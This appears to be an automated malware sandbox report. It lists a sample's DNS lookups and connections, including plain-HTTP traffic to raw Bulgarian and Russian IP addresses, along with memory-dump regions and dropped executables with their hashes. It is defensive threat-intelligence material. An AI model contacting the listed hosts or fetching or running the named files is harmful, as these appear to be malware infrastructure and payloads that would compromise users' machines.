US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 87.132.105.77.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
N/A 195.20.16.103:18305 tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 103.16.20.195.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 api.ipify.org udp
US 104.237.62.212:80 api.ipify.org tcp
US 8.8.8.8:53 212.62.237.104.in-addr.arpa udp
BG 91.92.254.7:80 91.92.254.7 tcp
RU 5.42.64.35:80 5.42.64.35 tcp
US 8.8.8.8:53 bit.ly udp
US 67.199.248.11:443 bit.ly tcp
US 8.8.8.8:53 7.254.92.91.in-addr.arpa udp
US 8.8.8.8:53 35.64.42.5.in-addr.arpa udp
US 8.8.8.8:53 114.110.16.96.in-addr.arpa udp

Files

memory/1800-0-0x0000000000400000-0x000000000040A000-memory.dmp

memory/3540-1-0x0000000002540000-0x0000000002556000-memory.dmp

memory/1800-3-0x0000000000400000-0x000000000040A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\F4B0.exe

MD5 9a747219c8fab73e2ba0541e3d86cd8b
SHA1 0723a7c85108ebd6a8141a7ce2459c35add81a0c
SHA256 eb33681098da51a889200090735de67ff170fbb4adb5b01284f08821134f5f01
SHA512 acb9faf833107d7a0ff16692861b03e3c719ef60851335082e75b16a53ee073ce53418e1aa57ca8c164ebb695ffc44638bfaeb533a79e15e1d480cee34b65a83

memory/3628-12-0x00000000008E0000-0x0000000000932000-memory.dmp

memory/3628-17-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/3628-18-0x00000000055E0000-0x0000000005B84000-memory.dmp

memory/3628-19-0x0000000004F70000-0x0000000005002000-memory.dmp

memory/3628-20-0x0000000005110000-0x0000000005120000-memory.dmp

memory/3628-21-0x0000000005040000-0x000000000504A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\6C2.exe

MD5 1713300ba962c869477e37e4b31e40af
SHA1 d5c4835bc910acccd28dbed0c451043ea8de95ef
SHA256 2bcdb7a75707f841615be19f4bbcb95fc6b16ce19fb7ea782c5ff43ea1be024d
SHA512 70b2a2b17c6b3a0a295baf536451ef38c6e9e292a3c967a9fc950a6de321bbac0dc45e942ef151ba81b717f8ede3166388e68ce75f2afff0ec16aea98ea742e1

memory/4440-26-0x0000000000A10000-0x0000000000EAE000-memory.dmp

memory/4440-27-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/4440-28-0x0000000005960000-0x00000000059FC000-memory.dmp

memory/4440-29-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/3628-30-0x00000000065B0000-0x0000000006BC8000-memory.dmp

memory/3628-32-0x00000000064A0000-0x00000000065AA000-memory.dmp

memory/3628-33-0x00000000063C0000-0x00000000063D2000-memory.dmp

memory/3628-34-0x0000000007E70000-0x0000000007EAC000-memory.dmp

memory/3628-35-0x0000000007EC0000-0x0000000007F0C000-memory.dmp

memory/3628-36-0x0000000008A40000-0x0000000008AA6000-memory.dmp

memory/3628-37-0x0000000008E80000-0x0000000008ED0000-memory.dmp

memory/3628-38-0x0000000005110000-0x0000000005120000-memory.dmp

memory/4440-39-0x0000000006370000-0x0000000006538000-memory.dmp

memory/4440-40-0x0000000007640000-0x00000000077D2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Protect544cd51a.dll

MD5 544cd51a596619b78e9b54b70088307d
SHA1 4769ddd2dbc1dc44b758964ed0bd231b85880b65
SHA256 dfce2d4d06de6452998b3c5b2dc33eaa6db2bd37810d04e3d02dc931887cfddd
SHA512 f56d8b81022bb132d40aa78596da39b5c212d13b84b5c7d2c576bbf403924f1d22e750de3b09d1be30aea359f1b72c5043b19685fc9bf06d8040bfee16b17719

memory/4440-47-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/4440-46-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/4440-49-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/4440-48-0x0000000005A60000-0x0000000005A70000-memory.dmp

memory/3628-50-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/4440-52-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/4440-51-0x0000000007DB0000-0x0000000007EB0000-memory.dmp

memory/2684-53-0x0000000000400000-0x000000000043C000-memory.dmp

memory/4440-54-0x0000000007DB0000-0x0000000007EB0000-memory.dmp

memory/4440-57-0x0000000005A70000-0x0000000005A80000-memory.dmp

memory/4440-55-0x0000000007DB0000-0x0000000007EB0000-memory.dmp

memory/3628-58-0x0000000005110000-0x0000000005120000-memory.dmp

memory/4440-59-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/2684-60-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/2684-61-0x0000000007A60000-0x0000000007A70000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\412D.exe

MD5 8b9a9846ed22725498334d05cd53e96b
SHA1 819487e2407b6070479a121594987160e8721ae1
SHA256 c6d0249a5f2565e25e90b9ec84dadbc3a297206374cce478c2c5511dae67c426
SHA512 62ea545908c0c3fe2e0356d2149eba870543202ceb412583a5df7d439c93d4f1de3cf4ac3d24ba0b8ffcef7f5f641f13d01c8ff8dea43d38b24a84cfc81469d6

C:\Users\Admin\AppData\Local\Temp\412D.exe

MD5 b2352a1ad0375980b805a09e9b2da12c
SHA1 692586364edfb0c7f3de38d4f410a75ee99b6790
SHA256 6a0c49855fd13193e5df48f663ead25b1d7d8b294fd7c1ae09e964e4228ccd12
SHA512 532b6c0033e021aa21e67651590ec73a827ddbb1ed179c0636c22cf6a4154f01919cbdcfe7a92943ee86c2574904924229dd31bc43e27a28b65e83963c98bb48

memory/4092-66-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/4092-67-0x0000000000250000-0x0000000001042000-memory.dmp

memory/3628-70-0x0000000009B00000-0x0000000009CC2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 c6c53c63657293e4da62c4e7f1d1831b
SHA1 a8379d445fb2226da97418f4d75bad07ef9290ca
SHA256 900c0640ba1e682128403dd48d4865aa07f3a63086c7e19bc8baa0ca79bd6cdf
SHA512 9033f375fa453f04734b22837f08d50b7c01156fce8cfc1536921afc8014015753e48280d266d8e71a5bb3b0a79572cdb82b08c921149d797c7494418ff85965

C:\Users\Admin\AppData\Local\Temp\48FE.exe

MD5 dc6fbf2cd9ad1f1f0ac200e9bec7ea3f
SHA1 c3af9d82d270829784339331dea63f927400e0d4
SHA256 2337b4b50924227e6f8772d9ce4b4bdbe6b8cfff15f493ea977e7c1280ad8590
SHA512 39307ae10cd7db4ff6da65090bf86af362955c25793dcf60cff65892aa759d3befc1180ee9039f5611f2d8393848a4f265dd34dd690161488b99c2a30b4aae2f

memory/3628-77-0x000000000A200000-0x000000000A72C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 9445be826cc1c194fe4364740ed979f9
SHA1 4efeb5866d82d211dd1f5a8a064ab83ab837af33
SHA256 c041d73c596c5686d387cdd9043ae9a669f1525524eaa02969960789f82547c6
SHA512 a868706e191b9084ca14e8f2b85b540c7ff758dde92a91488cd2b38c327811e07900b1a3c6ca870528a4b9e5ee9b410787f69a2c419317d768f02f9a85e3929a

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 62b01ec4a955eab3a7a41e2c07f18913
SHA1 48d8e1e391fa078d78e2130481f9d35eb45a11ec
SHA256 c76de2cd7f512fb4ccef14734eb63daa46c05c7e372e886381652e97dee9af56
SHA512 725dcf11ab6140f249e570960864011d12687ce177988ae9ec378a67062509c52a343a4db80cfdb9de03200eaf66569016590c1091cbda74ca795cf24f60fb56

C:\Users\Admin\AppData\Local\Temp\InstallSetup9.exe

MD5 e0b201d9da0623b03d1de1b63457e7b0
SHA1 60f1a5148b2f479efc51547e210a2ae583305b71
SHA256 18b641a8d75f26adb52148ff99a69a790e061d130924f62c08ffcedbadf87571
SHA512 c118ec59658286d35f00e9f49ec21f1c5508c77ca7ada4d81e40b0ed221bfb4722bb18c1e95a72bdde95af8323bb70bd6bc9a6e3bfad37ce2f33fcd0a0b048ea

C:\Users\Admin\AppData\Local\Temp\nsx4C18.tmp\Math.dll

MD5 ebd8a7a5042ae1d4ce1aa9071859c851
SHA1 ee508ce7cbe8b1b0bd471bee43e1ec19d21e8ad6
SHA256 fb6a0072377325b5da0d1da236d9da2610608e9ab74318e15540cc7aca75f837
SHA512 daebecc30e91b19737b346ed7ac85ada87757f53fa67fdd262ba617b29c24ebde4058171f71bf1bc8d0d8b39a9a346c7ef2a9968908dbc16723069d8f9507b0e

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\install.bat

MD5 60c9624e093baac4bef11ab4fc846111
SHA1 07a25911c81e04608a0dc6fb065524a9da82dd65
SHA256 e60ede01e4c366eca01c0d420190370cb52fb239d508593b343912735ef51d1d
SHA512 14e031235f82bb93ba8044c2d39673094707814e67485d819eccad5d1aae972bfba6a12d7bb27d9f70e38a94c3f5152a3d49a799ca9501a64afb420bb280ff24

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 0277dcbf0f270408ad6da03d0bc91b9a
SHA1 01fe1f3b96c9f4e64217c5437cfc0e0a73e234a7
SHA256 e19b0f1aa5c0f5ca4a97c996decb300e75a268c055715ae9e2fc6617a9441aaf
SHA512 7d089bda969c4d3a1c0f0939b9e1846e1e4e272897ee2c9399bfc92bf76d82afe471e3e61c744a0022fea04b60e803dc4a0a02b12f689899b773b8bd14540263

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 3b951c1abb0759086712224f8f6358dd
SHA1 ae7c06bfc7a3cf501c9760cc5ffbc8daaafafbbf
SHA256 6e0a154c6cbc66d2401987946f4c241ed87105ea24e4a29e13d890bd4cdfd968
SHA512 acbc0fe85c65c647debca24cd3eb383189bd0a4366b92303a62be4f94422d3f2d05f2a0edcde5f3a9913495ba77980de7168a8b6df24cef64c06703df04fd1b2

memory/2952-116-0x00007FFC39050000-0x00007FFC39B11000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe

MD5 eb531d81b8b7b4e7e6a5c91556d78281
SHA1 adfd40f48a48b0fd0e8a427e2a19b9051f946530
SHA256 47c8e2e9026f6acd497524c3e4dd910712fae8e0f24d5979e857d9b96f9b9b8a
SHA512 c38c980c83634f36ef24632bbcf2dab255016354d4f9cb2ef00ef21b1d9817cfa13a3daaecc0daa62db78d849ddf2050d93030f50083e0ddc06b035b7a7fbc11

C:\Users\Admin\AppData\Local\Temp\nsx4C18.tmp\INetC.dll

MD5 40d7eca32b2f4d29db98715dd45bfac5
SHA1 124df3f617f562e46095776454e1c0c7bb791cc7
SHA256 85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA512 5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

memory/2952-117-0x0000014E75750000-0x0000014E75760000-memory.dmp

memory/2952-118-0x0000014E75750000-0x0000014E75760000-memory.dmp

memory/552-119-0x00000000008B0000-0x00000000008B9000-memory.dmp

memory/4876-121-0x0000000000400000-0x0000000000409000-memory.dmp

memory/552-120-0x00000000009C0000-0x0000000000AC0000-memory.dmp

memory/3628-124-0x0000000005110000-0x0000000005120000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_arg0bq3t.cdy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2556-125-0x0000000000B40000-0x0000000000B41000-memory.dmp

memory/2952-135-0x0000014E77900000-0x0000014E77922000-memory.dmp

memory/4876-123-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 1c1bcdb0b26032497a333c49e5777e5c
SHA1 ad3f475adcb7c92818a9007f26e284faab2372c5
SHA256 a503985a9cd752160db220650711b84834b3ad631497bb3133d7c73fc28dbf92
SHA512 0f28b2c7a3a913accb98a70f6f8d4ed70a1a90bd14a0106cf41628a9314b7e42b8d917c25157fb92fc3031543ff035a0760a6bca670cd3ad9483f9eadd118313

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 7d2bf2a6b821dd9f87ad328ea27af2e5
SHA1 a32a1e0d1f401c5ba3cd4d53430fc2b61286c821
SHA256 a617ca6b1603e5a637e79c6f6d3fe36efb4eeff9cfb4df7a0a57a2a21ffedb9a
SHA512 6234081698dee53ce4f826fdc1bee44c6d5b1f68f6d13bec5186013cb5c6ea4af3a40ba544fe822ca6bb0a52c7a7d6a489ee54f6ccfcd2ab2d1d79396da5568a

C:\Users\Admin\AppData\Local\Temp\tuc3.exe

MD5 69a86cf45d9ce53c1f497f0921770a5f
SHA1 9d92e5c7e600779be84e21fd7d54ce3e91683b04
SHA256 7bb67b2ed4d5f7b7a6e92118e7b2a1a92c0a2720e76d59499a67861c0261d582
SHA512 552e8b7bb8da2d9654734f48837bcbb09e23b19a99621c7cbbf47ff5954fb5fa63fb31678a9e7a0fababf312c91d0aee4f2cac0a28d3ef132ea3600c6469685e

memory/2240-144-0x0000000000400000-0x0000000000418000-memory.dmp

memory/4624-147-0x00000000029A0000-0x0000000002DA6000-memory.dmp

memory/4092-150-0x0000000074F90000-0x0000000075740000-memory.dmp

memory/2240-149-0x0000000000400000-0x0000000000418000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\is-VMQBB.tmp\tuc3.tmp

MD5 f448d7f4b76e5c9c3a4eaff16a8b9b73
SHA1 31808f1ffa84c954376975b7cdb0007e6b762488
SHA256 7233b85eb0f8b3aa5cae3811d727aa8742fec4d1091c120a0fe15006f424cc49
SHA512 f8197458cd2764c0b852dac34f9bf361110a7dc86903024a97c7bcd3f77b148342bf45e3c2b60f6af8198ae3b83938dbaad5e007d71a0f88006f3a0618cf36f4

memory/4624-151-0x0000000002DB0000-0x000000000369B000-memory.dmp

memory/4624-155-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-S4J2J.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Temp\is-S4J2J.tmp\_isetup\_isdecmp.dll

MD5 3adaa386b671c2df3bae5b39dc093008
SHA1 067cf95fbdb922d81db58432c46930f86d23dded
SHA256 71cd2f5bc6e13b8349a7c98697c6d2e3fcdeea92699cedd591875bea869fae38
SHA512 bbe4187758d1a69f75a8cca6b3184e0c20cf8701b16531b55ed4987497934b3c9ef66ecd5e6b83c7357f69734f1c8301b9f82f0a024bb693b732a2d5760fd303

memory/1236-171-0x0000000000550000-0x0000000000551000-memory.dmp

memory/2952-172-0x0000014E75750000-0x0000014E75760000-memory.dmp

memory/4876-287-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3540-283-0x0000000002770000-0x0000000002786000-memory.dmp